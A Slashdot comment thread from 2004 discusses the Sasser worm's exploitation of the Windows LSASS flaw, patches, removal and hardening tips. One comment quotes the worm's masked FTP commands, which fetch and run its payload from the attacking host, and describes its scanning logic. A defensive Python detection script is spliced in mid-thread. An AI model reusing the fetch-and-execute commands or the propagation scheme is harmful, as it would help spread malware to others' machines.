New Windows Worm on the Loose
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."
For anyone already infected, Microsoft has manual removal instructions for the worm, located here:
http://www.microsoft.com/security/incident/sasser.asp
It's started when you do
# apt-get update && apt-get dist-upgrade
Toolbars and similar items would not be prevented by blocking mutexes as far as I know, because they don't create one. They run under the IE process.
However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.
"I will trust Google to 'do no evil' until the founders no longer run it." Hello Alphabet.
Interesting concept, but many programs use lots of mutexes, and some don't use them at all.
Imagine running something complex like a database server. Dialog box fun.
The virus writers will just use something else, like a file, if people tracked by mutex.
You can set permissions in the registry per key.
Make it impossible to write to HKLM/software/microsoft/windows/currentversion/run
More information at Computer Associates, F-Secure, Symantec and McAfee.
Where's Panda in that list? Personally I prefer Panda over those.
It then connects to that shell, and executes the following commands (cleaned up to get past Slashdot's junk filter):
open XXX.XXX.XXX.XXX 5554
anonymous
user
bin
get XXXXX_up.exe
bye
XXXXX_up.exe
If successful, those commands FTP to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from Symantec:
The IP addresses generated by the worm are distributed as follows:
50% are completely random
25% have the same first octet as the IP address of the infected host
25% have the same first and second octet as the IP address of the infected host.
The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.
See:
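The 50/25/25 target mix quoted above is a usable detection fingerprint for defenders: if one host's outbound port 445 probes fall into those buckets, it is worth pulling off the network. The script below is an added example, not part of the post or of any vendor tool; it assumes a simple constructed "src -> dst:port" log format and a made-up source host 10.20.30.40.

```python
from collections import Counter

# Constructed sample of outbound connection records (src -> dst:port) from one
# host, 10.20.30.40. Made up for this example; not a real capture.
SAMPLE_LOG = """\
10.20.30.40 -> 10.20.77.5:445
10.20.30.40 -> 10.99.1.1:445
10.20.30.40 -> 203.0.113.9:445
10.20.30.40 -> 198.51.100.20:445
10.20.30.40 -> 10.20.8.200:445
10.20.30.40 -> 10.7.7.7:445
10.20.30.40 -> 192.0.2.77:445
10.20.30.40 -> 172.16.5.5:445
10.20.30.40 -> 10.20.30.41:80
"""

# Documented Sasser target mix: 50% random, 25% same first octet,
# 25% same first two octets as the infected host.
SASSER_MIX = {"random": 0.50, "same_first": 0.25, "same_first_two": 0.25}

def classify(src, dst):
    """Bucket a destination by how many leading octets it shares with the source."""
    s, d = src.split("."), dst.split(".")
    if s[:2] == d[:2]:
        return "same_first_two"
    if s[0] == d[0]:
        return "same_first"
    return "random"

def parse(log):
    """Yield (src, dst, port) tuples from the constructed log format above."""
    for line in log.splitlines():
        src, _, rest = line.partition(" -> ")
        dst, _, port = rest.rpartition(":")
        yield src.strip(), dst, int(port)

def scan_profile(log, port=445):
    """Fraction of targets in each bucket, counting only hits on the LSASS port."""
    counts = Counter(classify(src, dst) for src, dst, p in parse(log) if p == port)
    total = sum(counts.values())
    return {k: counts[k] / total for k in SASSER_MIX} if total else {}

def looks_like_sasser(log, min_hits=8, tolerance=0.15):
    """True when enough port-445 probes fit the 50/25/25 pattern within tolerance."""
    hits = sum(1 for _, _, p in parse(log) if p == 445)
    if hits < min_hits:
        return False
    profile = scan_profile(log)
    return all(abs(profile[k] - v) <= tolerance for k, v in SASSER_MIX.items())

if __name__ == "__main__":
    print(scan_profile(SAMPLE_LOG), looks_like_sasser(SAMPLE_LOG))
```

In practice you would raise min_hits well above eight and compare against the host's normal traffic baseline, since a legitimate file server also talks to many port 445 peers.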
Use regedt32.exe (which is an older incarnation of regedit), go to the key in question, choose Security | Permissions ... from the menu etc...
Err, Startup Monitor does just that.
Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..
My email addy? should be easy enough.
Run "regedit", then right click any key, and select "Permissions" -- you get a standard NTFS permissions box to fiddle with at your leisure.
Note this only works on NT-based systems (e.g., WinXP)
It exists already. There are several, some free, some not, but the most useful (and free!) one I've found so far is the brand-new Spybot TeaTimer. It's available with the newest release candidate. You can download that here (link at the bottom of the forum post). Just run Spybot SD, do the immunization and such, run the scan, then switch it to Advanced mode and activate the "resident protection". Bingo. Nothing will ever write itself into your startup, or install a BHO, or toolbar, or change your homepage, without your knowledge and permission. Bear in mind it's a release candidate and there may be bugs; I know the Teatimer sometimes shuts off when you run the main Spybot program, and you have to go activate it again. Other than that it seems to work like a charm.
End of lesson. You may press the button.
The patches were released on the 13th of April; there were four patches which, put together, patch 20 different vulnerabilities.
You've probably already installed it, just look for KB835732 in your list of installed updates.
In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.
Sasser generates traffic on TCP ports 445, 5554 and 9996.
The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:
http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
This link should work for the symantec description of Sasser. Sangloth I'd appreciate any comment with a logical basis...it doesn't even have to agree with me.
It's called X Window System, not X Windows. Calling someone an MS fanboy because they point this out is uncalled for. Speaking of which... there are MS fanboys? Are these people out of their minds?
Everyone knows not to use Windows products until after at least one service pack; this is an old problem that was fixed with Service Pack 1. I hope no one on /. is affected by this, because even if you miss most updates, the service packs are the important ones.
I run Windows XP Pro at home so this post raised my concern at first, but if anyone actually read the Microsoft security bulletin, you would all know this.
Before I get flamed for running Windows, that box mostly just runs games, though sometimes I have it running distccKNOPPIX to help cross-compile for my Gentoo box. It's time to rebuild again now that 2004.1 came out!!!!
~ there are 10 types of people in this world, those that can read binary and those that can't
I had stopped ZA from starting up by default for the past few days, but I enabled it which allowed me to grab that one patch.
The worm can be removed with McAfee's stinger tool (the Mcafee link has a link to it).
Systems all clear.
www.google.com
WinPatrol does this as well, along with protecting/watching many other aspects of the system for potentially unwanted changes.
SUS again updates only the OS + Office suite, so that doesn't cut it.
I would certainly prefer to wait a few hours for a test machine to compile a package and then be able to deploy it (binary) to all the machines after testing. It's all in the choice of design, Windows is still at heart a single user operating system, Linux, Unix, BSD, etc are all multi-user operating systems, and it is reflected in installs.
You can also enable auditing that will record attempts to access keys you want to watch in the same dialog (see Advanced->Auditing). But first, you have to enable the auditing policy: in the control panel, go to Administrative Tools->Local Security Policy. Then Local Policies->Audit Policy. Registry keys are considered objects.
Access attempts will show up in the event viewer.
Note: use regedt32.exe for Win2000 or earlier. For later versions, regedit.exe does everything (under Edit->Permissions).
Most of these problems they have (certain virii, spyware, adware) could be alleviated and less of a threat simply by running limited user accounts instead of running as an "admin" all the time.
I tested this in my home network (the other half has to have Windows). Her rights are set by a Samba server acting as a PDC (I was bored), but it basically boils down to a simple matter of her account being considered a "limited account" on her local XP machine. If something needs to be installed or needs admin rights, she can explicitly tell it to by using "Run as...".
I've gone from cleaning 50+ items a week off that machine to maybe 3-4, and those are simply cookies being reported as "spyware".
Someone here obviously isn't using the 2.6 kernel tree with the happy new scheduler and timer. I can be happily compiling openoffice and still watch dvd's, play music, browse the web...anything else?
Sasser was released 18 days after Microsoft released the patch. For comparison, Blaster was 32 days after the patch and Witty was 1 day(!).
There are several modes for the "automatic" updates; some depend on OS/SP and on whether you have SUS/WUS installed. (If it's a work laptop, they may have SUS/WUS configured for the updating process.)
In 2k and XP, you can
1- do nothing
2- Ask before downloading and before installing. (only admin users can say yes)
3- download updates automatically, but ask for installation (only admin users can install; they are asked if they want to go ahead with the install)
4- automatically install at a fixed time (default 2 or 3 am); if a reboot is needed when a user logs in, it asks to reboot.
By default it's #3.
In 2k, the option can be changed in the control panel (SP3 or higher needed).
In XP, right click on "My Computer", Properties, go to the Automatic Updates tab.
--
Time is on my side
try using a google cache.
I've told so many others by now, so I might as well put it on Slashdot.
Blah blah sig blah blah blah irony blah blah
Our student dorm has its own network volunteer group, which I'm part of. This worm made a big entrance tonight, scoring 27 infections in two hours, on a network comprising about 300 machines, maybe 220 of which are running Windows. We had to take the suckers off the network AND, because that's part of our self-imposed policy, drop a filled-in piece of paper into their letter boxes. I felt like the mail man, running around in the entrance hall with a wad of papers under my arm. Oh, and our upstream ISP got pissed at us, threatening to cut our connection altogether. To sum it all up, I'm going to kill the guy who wrote this, right after I cheerfully refuse to reconnect all the suckers who fell for it!
Divide et impera!
Actually, on XP with default settings, commdlg32.dll (or any other system file) will be restored by the OS from a backup location when you delete it.
Your own fault for disabling the Crypto service. Without it Windows Update cannot verify the signatures. Those stupid 'XP optimization guides' commonly tell you that disabling it is a good idea...
You could make a shell script that does it all for you that is set UID root.
No, you can't. Linux ignores the suid flag on scripts.
Centralization breaks the internet.
My VPN server uses one TCP port, nya nya.
VPN over TCP will give you performance problems. In fact any tunnel device over TCP will give you performance problems. It is the two instances of TCP in the protocol stack that are responsible for most of the problems. Any VPN system built on TCP is broken; it should be built on UDP.